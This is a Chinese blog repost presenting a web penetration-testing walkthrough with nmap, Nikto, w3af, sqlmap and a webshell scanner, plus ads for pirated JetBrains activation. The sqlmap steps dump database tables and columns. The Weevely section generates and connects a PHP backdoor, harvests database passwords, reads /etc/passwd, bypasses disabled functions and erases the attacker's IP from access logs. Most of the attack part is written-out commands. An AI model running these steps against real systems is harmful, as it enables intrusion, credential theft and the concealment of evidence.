web渗透测试工具大全_web安全攻防渗透测试实战指南 pdf

web渗透测试工具大全_web安全攻防渗透测试实战指南 pdf一、渗透测试工具nmap,查看网站服务器开放的端口1、查看服务器上运行的服务$nmap-sVhack-test.com2、查看操作系统版本$nmap-Ohack-test.com二、使用Nikto来收集漏洞信息#官方网站:https://cirt.net/nikto2#wgethttps://cirt.net/nikto/nikto-2.1.5.

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

一、渗透测试工具nmap,查看网站服务器开放的端口

1、查看服务器上运行的服务
$ nmap -sV hack-test.com

2、查看操作系统版本
$ nmap -O hack-test.com

这里写图片描述

这里写图片描述

二、使用Nikto来收集漏洞信息

#官方网站:https://cirt.net/nikto2
#wget https://cirt.net/nikto/nikto-2.1.5.tar.gz (解压就可以用)

$ perl nikto.pl -h hack-test.com(ip或者域名)

这里写图片描述

三、用Backtrack 5 R1中的W3AF(Web应用扫描器或者叫做安全审计工具)

官方网站:http://sourceforge.net/projects/w3af/
建议下载window版本,linux需要安装python的好多依赖包,需要调试的比较多

#linux环境安装
$ git clone https://github.com/andresriancho/w3af.git
$ cd w3af/
$ ./w3af_console
$ /tmp/w3af_dependency_install.sh

这里写图片描述

后面我用的是windows版本测试的:
这里写图片描述

四、Sqlmap来检测url是否存在SQL注入

$ python sqlmap.py  –u url地址

#加入参数"-dbs"来尝试采集数据库名
$ python sqlmap.py  –u url地址 -dbs

#参数"-D 库名 --tables"来查看改数据库的所有表名
$ python sqlmap.py  –u url地址 -D 库名 --tables

#参数"-T 表名 --columns"来查看表中的字段
$ python sqlmap.py  –u url地址 -D 库名 -T 表名 --columns

#参数"-C 列名1,列名2 --dump"来查看值
$ ython sqlmap.py  –u url地址 -D 库名 -T 表名 -C 列名1,列名2 --dump

五、WebShell|网站后门检测工具

官网地址:http://www.webshell.pub/
#可以在线检测,也可以下载客户端
#我用客户端检测了下我们服务器的代码,蛮好用的

#在linux上运行命令
$ ./hm scan 网站根目录

六、Weevely(生成php后门工具)

下载地址: https://github.com/epinna/Weevely3
$ git clone https://github.com/epinna/weevely3.git
$ cd weevely3

#生成一个后门木马hello.php,密码为test
$ ./weevely.py generate test hello.php

这里写图片描述

#连接后门
$ ./weevely.py http://url地址/hello.php test

这里写图片描述

连接后操作命令
#查看系统信息
$ system.info

#获取数据库连接信息
$ grep . '^[^*/#]*passw?o?r?d?'    #使用grep命令查找其他用户存储在php脚本中的密码
$ grep . 'mysql_conn'              #连接数据库的语句
$ :sql_console -user 用户名 -passwd 密码 -host 数据库地址        #使用sql_console模块来连接数据库

#绕过策略读取/etc/passwd
$ :audit_etcpasswd

#日志清理
$ cd logs
$ :system_info -info client_ip   #使用system_info命令找到我们自己的ip
$ grep access.log ip地址          #截取日志中含有这个ip地址的信息
$ grep access.log -v ip地址 -output cleaned.log  #清掉日志中含有这个ip地址的信息
$  grep cleaned.log ip地址     #查看是否已经删除

#用cleaned.log来替换access.log
$ rm access.log
$ cp cleaned.log access.log
$ rm cleaned.log

#绕过系统禁用函数
$ :audit_disablefunctionbypass
$ ps -ef
$ quit

详情请参考:http://www.freebuf.com/sectool/39765.html
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/169924.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(1)


相关推荐

  • Android adb 命令大全「建议收藏」

    Android adb 命令大全「建议收藏」转自:https://github.com/mzlogin/awesome-adbADB,即AndroidDebugBridge,它是Android开发/测试人员不可替代的强大工具,也是Android设备玩家的好玩具。持续更新中,欢迎提PR和Issue补充指正,觉得有用的可以将此GitHub仓库Star收藏备用。注:有部分命令的支持情况可能与Android…

  • 推荐系统中传统模型——LightGBM + FFM融合

    推荐系统中传统模型——LightGBM + FFM融合之前比较相关的文章:推荐系统中传统模型——LightGBM+LR融合python-机器学习lightgbm相关实践1深入FFM原理与实践来自美团技术团队的,深入FFM原理与实践FM和FFM模型是最近几年提出的模型,凭借其在数据量比较大并且特征稀疏的情况下,仍然能够得到优秀的性能和效果的特性,屡次在各大公司举办的CTR预估比赛中获得不错的战绩。美团技术团队在搭建DSP的过程中,探索并使用了FM和FFM模型进行CTR和CVR预估,并且取得了不错的效果。经过One-Hot编码之后,大部分

  • pycharm调大字体快捷键_设置pycharm字体大小

    pycharm调大字体快捷键_设置pycharm字体大小一、pycharm字体放大的设置File—>setting—>Keymap—>在搜寻框中输入:increase —>IncreaseFontSize

  • Intellij idea创建springboot项目时报错Artifact contains illegal characters

    Intellij idea创建springboot项目时报错Artifact contains illegal characters

  • ubuntu桌面主题更换_ubuntu18主题美化

    ubuntu桌面主题更换_ubuntu18主题美化本文针对的是ubuntu的GNOME桌面环境,根据ubuntu官方消息,ubuntu已经放弃原来的Unity桌面环境,改回最先使用的GNOME桌面环境,如果你觉得Gnome的默认桌面环境不够Fashion的话,可以下载自己喜欢的主题风格来更换,具体教程如下。在开始前,先放上几张我自己的ubuntu界面0.确认你的桌面环境首先确认你的桌面环境是GNOME,确认方法可以选择…

  • 数据建模方法及步骤图_comsol建模步骤教程

    数据建模方法及步骤图_comsol建模步骤教程何为建模?数据几乎总是用于两种目的:操作型记录的保存和分析型决策的制定。简单来说,操作型系统保存数据,分型型系统使用数据。前者一般仅反映数据的最新状态,按单条记录事务性来处理;其优化的核心是更快地处理事务。后者往往是反映数据一段时间的状态变化,按大批量方式处理数据;其核心是高性能、多维度处理数据。通常我们将操作型系统简称为OLTP(On-LineTransactionProcessing)…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号